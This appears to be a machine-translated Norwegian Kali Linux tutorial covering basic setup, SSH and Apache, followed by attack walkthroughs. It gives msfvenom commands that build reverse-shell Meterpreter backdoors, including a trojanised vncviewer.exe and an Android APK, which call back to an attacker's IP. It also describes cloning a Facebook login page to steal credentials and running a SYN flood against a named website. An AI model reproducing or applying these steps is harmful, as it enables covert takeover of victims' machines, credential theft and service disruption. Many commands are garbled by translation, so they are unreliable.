Hvorfor du bør bruke Kali Linux?
Kali Linux brukes hovedsakelig av penetrasjonstestere, sikkerhetsrevisorer, rettsmedisinske etterforskere og forskere. Det har nesten hvert verktøy eller skript forhåndsinstallert som kan brukes til et av ovennevnte formål. Du kan bruke Kali Linux til å knekke WiFi -nettverk, for å kjøre open source intelligens (OSINT) på noen, for å hacke nettsteder og nettverk og mange flere.
Annet enn etisk hacking har Kali Linux også et sett med verktøy for rettsmedisinske undersøkelser. Rettsmedisin er en annen viktig og fremvoksende sikkerhetsgren som har hovedformål å samle og analysere bevis på en kriminell aktivitet og deretter for å spore cyberkriminelle. Forensics -undersøkelse hjelper til med å spore og fjerne ondsinnede effekter (bakdører, malwares) resulterte fra en kriminell aktivitet og beregne/håndtere tapet etter et cyberangrep. Kali Linux har en egen stealth live -modus for "rettsmedisin" -operasjoner der den ikke etterlater noe fingeravtrykk på vertssystemet.
Blir komfortabel med Kalis miljø
Kali er ikke laget for vanlige brukere, og det er ikke veldig brukervennlig som Windows eller Ubuntu. Standardmiljøet er rot, som ikke er veldig enkelt å bruke og er ganske farlig for noobs. Det mangler også noen grunnleggende verktøy som Snap, VirtualBox og andre nyttige verktøy som er til stede i Ubuntu.
Første ting først
Første ting å gjøre er å lage en ikke-root-bruker
root@kali: ~# adduser kali
Legge til bruker 'Kali' ..
Legger til ny gruppe 'Kali' (1002) ..
Legger til ny bruker 'Kali' (1002) med gruppen 'Kali' ..
Opprette hjemmekatalog '/home/kali' ..
Kopiering av filer fra '/etc/Skel' ..
Nytt passord:
... Snip ..
root@kali: ~# usermod -ag sudo kali
Initialiser Metasploit Frameworks PostgreSQL -database
root@kali: ~# msfdb init
Opprette databasebruker 'MSF'
Skriv inn passord for ny rolle:
Skriv inn det igjen:
Opprette databaser 'MSF' og 'MSF_TEST'
... Snip ..
Legg til følgende linjer i “/etc/apt/kilder.liste ”-filen
Deb http: // http.Kali.org/kali kali-rulling hoved bidrag til ikke-fri
# For tilgang til kildepakke, ukommentar følgende linje
# Deb-Src http: // http.Kali.org/kali kali-rulling hoved bidrag til ikke-fri
Installer noen andre nyttige verktøy.
root@kali: ~# apt -get update && apt oppgradering -y
root@kali: ~# apt-get installer virtualbox virtualbox-dkms gobuster tor tor-nettleser
openVpn htop atom dypin -terminal tilix -y
Administrere Kalis standardtjenester
Kali kommer med mange forhåndsinstallerte ikke-standardtjenester som PostgreSQL, MySQL, SSH, HTTP. Hvis ikke konfigurert riktig, vil disse tjenestene starte som en bakgrunnsprosess når Kali Linux starter opp og disse åpne portene kan være en trussel for systemets sikkerhet.
I denne delen skal vi se på hvordan disse tjenestene fungerer og hvordan du kan konfigurere dem riktig og hvordan du kan bruke dem. Standard måten å konfigurere et verktøy eller en tjeneste er å lese ReadMe Doc -filen. ReadMe -filen inneholder standardprosedyren for å konfigurere og bruke et verktøy eller en tjeneste. Readme -filer er vanligvis lokalisert i “/usr/share/doc/[tool_name]/readme” -mappen.
Secure Shell Service (SSH)
Secure Shell (SSH) har blitt brukt i lang tid som et standardverktøy for å eksternt utføre kommandoer, overføre filer og andre eksterne administrasjonsformål. Pakken inkluderer SSH (klient) og SSHD (Service) for å kontrollere andre maskiner eksternt.
SSH -tjenesten startes ikke som standard når Kali starter opp, kan du starte den ved å skrive,
root@kali: ~ $ service ssh start
root@kali: ~ $ netstat -antp | grep -i sshd
TCP 0 0 0.0.0.0:22 0.0.0.0:* Lytt 6601/sshd
tcp6 0 0 ::: 22 :::* lytt 6601/sshd
Hvis du vil SSHD for å starte hver gang når Kali starter opp. Type
root@kali: ~ $ update-rc.D SSH Aktiver
Hvis du vil at noen skal logge inn på PCen din via SSH, vil den bruke Kali -brukernavnet og passordet ditt for innloggingsgodkjenning. Så bedre endre standardpassordet ditt "Toor" til noe sikkert.
root@kali: ~ $ passwd
Endre passord for root.
Nåværende passord:
Nytt passord:
Skriv inn nytt passord på nytt:
Passwd: Passord oppdatert vellykket
Nå, last inn SSH -tjenesten for å påvirke endringer
root@kali: ~ $ service ssh reload
HTTP -tjeneste
HTTP -tjeneste er veldig gunstig mens du utfører etiske hacking relaterte oppgaver. Det kan brukes til å være vertskap for falske phishing websider og nettsted, for å overføre filer til eksterne offerservere. Når webapplikasjoner blir mer populære hver dag, er det nå viktigere å ha kunnskap å forstå og betjene HTTP -servere som Apache.
Apache er en HTTP-server som kommer forhåndsinstallert i Kali. Apaches HTTP -tjeneste er deaktivert som standard, men du kan starte den med følgende kommando.
root@kali: ~ $ service apache2 start
Apache vil være vertskap. Gå til http: // localhost: 80/
For å starte det hver gang når kali starter, skriv inn
root@kali: ~ $ update-rc.D Apache2 Aktiver
Du kan også konfigurere Apache på ikke-standardport ved å endre konfigurasjonsfilen (/etc/apache2/porter.konf)
root@kali: ~ $ nano/etc/apache2/porter.konf
Lagre filen og kjør deretter
root@kali: ~ $ service apache2 omstart
Nå vil Apache servere på port “1234” i stedet for standardport 80.
Hvis du vil lese full dokumentasjon av Apache Server, gå til katalogen “/usr/share/doc/apache2/”, skriv inn
root@kali: ~ $ cd/usr/share/doc/apache2/
root@kali:/usr/share/doc/apache2 $ gzip - -decompress readme.Debian.gz
root@kali:/usr/share/doc/apache2 $ nano readme.Debian
En liste over noen nyttige kommandoer
Lokaliser brukes til å finne en fil i Linux, før du bruker denne kommandoen, må du oppdatere databasen først
root@kali: ~# oppdatertb
root@kali: ~# finnes uqjhssvf.JPEG
/root/uqjhssvf.JPEG
finne er mer aggressiv og stoler ikke på databasen. Den søker rekursivt etter filen i gitt katalog og dens underkataloger.
root@kali: ~# finn ./ -navn Main.py
./Desktop/Main.py
WGET kan brukes til å laste ned en webside eller fil i terminalen.
root@kali: ~# wget tinyuba.com
--2019-05-11 08: 58: 48-- http: // TinyTuba.com/
Løs TinyTuba.com (TinyTuba.com)… 52.216.129.66
Koble til TinyTuba.com (TinyTuba.com) | 52.216.129.66 |: 80 ... tilkoblet.
HTTP -forespørsel sendt, venter på svar ... 200 OK
Lengde: 1551 (1.5k) [tekst/html]
Sparer til: 'Indeks.html '
indeks.HTML 100%[===========================>] 1.51k --.-KB/s i 0s
2019-05-11 08:58:50 (56.5 MB/s) - 'Indeks.html 'lagret [1551/1551]
root@kali: ~# firefox indeks.html
topp Gir deg informasjon om din CPU, minnebruk og annen statistikk.
historie Vis listen over tidligere kommandoer som du har lagt inn i terminalen din.
Noen andre nyttige kommandoer som du kan finne på internett er LS, RM, RMDIR, Adduser, Deluser, Service, Nano, Cat, More, Less, Uname, Whoami etc
Generere ondsinnede bakdører
Du kan generere ondsinnede Exe -binærfiler ved å bruke "MSFvenom" Kali Linux og installere dem på andres system for å kontrollere det eksternt.
root@kali: ~ $ msfvenom -a x86 -platform windows -b '\ x00' -p windows/meterpreter/reverse_tcp
Lhost = [angripers IP -adresse] LPORT = [angriperens portnr] -F Exe> Moro.EXE
Fant 11 kompatible kodere
Forsøker å kode nyttelast med 1 iterasjoner av x86/shikata_ga_nai
x86/shikata_ga_nai lyktes med størrelse 368 (iterasjon = 0)
x86/shikata_ga_nai valgt med endelig størrelse 368
Nyttelaststørrelse: 368 byte
Endelig størrelse på exe -fil: 73802 byte
root@kali: ~ $ ls moro.EXE
moro.EXE
root@kali: ~ $ fil moro.EXE
moro.EXE: PE32 kjørbar (GUI) Intel 80386, for MS Windows
For å generere bakdør for X64 Architecture Windows Systems, skriv inn følgende kommando.
root@kali: ~ $ msfvenom -platform windows -b '\ x00' -p windows/x64/meterpreter/reverse_tcp
Lhost = [angripers IP -adresse] LPORT = [angriperens portnr] -F Exe> Moro.EXE
[-] Ingen bue valgt, velg Arch: x64 fra nyttelasten
Fant 3 kompatible kodere
... Snip ..
root@kali: ~ $ fil moro.EXE
moro.EXE: PE32+ kjørbar (GUI) x86-64, for MS Windows
Innebygging av bakdører i legitime applikasjoner ved hjelp av Kali
Du kan også legge inn den ondsinnede bakdørkoden din i en ufarlig exe -fil som Adobe Reader Installer eller noen kjørbar mediespiller. Den resulterende bakdøren kjørbar vil se ut som legitim programvare, men når den utføres på offerets datamaskin, vil den kjøre din ondsinnede bakdør sammen med den legitime applikasjonen, noe som resulterer i kompromiss av offerets PC.
Det er noen Windows -kjørbare som allerede er til stede i Kali Linux, som vi vil bruke til demonstrasjon.
root@kali: ~ $ ls/usr/share/windows-binaries/
Bakdører/ exe2bat.exe fport/ klogger.exe nbtenum/ plink.EXE VNCVIEWER.Exe Whoami.EXE
enumplus/ fgdump/ hyperion/ mbenum/ nc.exe radmin.exe wget.EXE
Vi injiserer nyttelasten vår til “VNCViewer.exe ”kjørbar.
root@kali: ~ $ msfvenom -a x86 -platform windows -x/usr/share/windows -binies/vncviewer.EXE
-k -p windows/meterpreter/reverse_tcp lhost = [angripers ip] lport = [angriperens port]
-e x86/shikata_ga_nai -i 3 -b "\ x00" -f exe -o vncviewer.EXE
Fant 1 kompatible kodere
Forsøker å kode nyttelast med 3 iterasjoner av x86/shikata_ga_nai
... Snip ..
Nyttelaststørrelse: 422 byte
Endelig størrelse på exe -fil: 421376 byte
Lagret som: VNCViewer.EXE
Genererer Android -bakdører
For å kontrollere android -telefoner eksternt, kan du generere ondsinnede APK -filer ved hjelp av MSFvenom.
root@kali: ~ $ msfvenom -p android/meterpreter/reverse_tcp lhost = [angriperens ip]
LPort = [angriperens port nei] r> hva som helst.apk
[-] Ingen plattformer ble valgt, valg av MSF :: Module :: Platform :: Android fra nyttelasten
[-] Ingen bue valgt, velg Arch: Dalvik fra nyttelasten
Ingen koder eller Badchars spesifiserte, og gir ut rå nyttelast
Nyttelaststørrelse: 10087 byte
Sosialteknikk ved hjelp av setoolkit
Sosialteknikk er bruken av bedrag for å lure noen til å avsløre deres konfidensielle eller personlige informasjon som kan bli misbrukt til ondsinnede formål.
Den mest brukte teknikken for sosialteknikk er phishing, der du prøver å sende meldinger, e -postmeldinger eller telefonsamtaler for å få personlig, spesielt penger relatert informasjon. I phishing -angrepet blir mottakeren av en e -post overtalt at han har fått e -posten fra en ekte kilde som en bank eller en regjeringsavdeling, og deretter lurt for å avsløre hans sensitive legitimasjon.
I denne demonstrasjonen kloner vi en Facebook -påloggingsside ved hjelp av Setoolkit og er vert for den siden på HTTP -serveren vår, så sender vi HTTP -serverens IP -adresse til offer. Når offeret logger seg på vår falske Facebook -påloggingsside, vil denne siden sende brukernavnet og passordet hans til Kali -maskinen vår.
Type setoolkit I terminalen åpnes Setoolkit
Når offeret angir vår IP -adresse i nettleseren hans, vil han bli presentert for vår falske Facebook -påloggingsside som vi har opprettet tidligere. Vi må vente til offeret kommer inn i brukernavnet og passordet til vår klonede side. Den falske Facebook -siden vil se slik ut,
Så lenge brukeren kommer inn i legitimasjonen, vil Setoolkit vise dem på terminalen.
Denne demoen var på lokalt nettverk, hvis du vil gjøre dette på offentlig IP, må du enten gjøre portvideresending på ruteren din, eller du kan bruke Ngrok til offentlig IP- og portnummer.
Nektelse av tjeneste (DOS) angrep ved bruk av Metasploit
Nektelse av tjeneste (DOS) angrep er en type angrep på et system eller et nettverk som reduserer eller begrenser tilgjengeligheten av systemressurser til sine legitime brukere. Hensikten med et DOS-angrep er ikke å stjele sensitiv informasjon, i stedet prøver angriper å oversvømme offer-systemet med ikke-legitime serviceforespørsler for å overbelaste ressursene.
Et distribuert angrep fra benektelse (DDoS) trenger et stort antall systemer (referert til som zombier) som angriper et enkelt mål, noe som resulterer i tjeneste for nektelse. Et enkelt DOS -angrep kan ikke påvirke store bedriftsservere og nettverk, det er derfor DDoS er mer effektivt og dødelig. Det er også vanskelig å spore ned og blokkere DDoS -angrep fordi hundrevis og tusenvis av zombie -systemer angriper en enkelt vert.
De er mange verktøy og skript som. Vi prøver å ta ned et eksempel på nettstedet “www.Jarusa.com ”.
Først, gå til https: // www.Isitdownrightnow.com/ og bekreft at nettstedet er i gang
Nettstedet er oppe. Nå, åpen Metasploit Framework -konsoll i terminalen din.
root@kali: ~ $ msfconsole
... Snip ..
MSF5> Bruk hjelpe/DOS/TCP/SYNFLOOD
Finne ut www.Jarusa.comsin IP -adresse og angir den som rhost og kjører deretter angrepet
Etter en stund vil du se at nettstedet ikke er tilgjengelig. Bekreft det ved å bruke https: // www.Isitdownrightnow.com/
Kali Linux er et hjem for etiske hackere, og denne opplæringen har forhåpentligvis opplyste deg til det grunnleggende i Kali Linux, hva den kan gjøre, og hvordan du kommer i gang med bruken.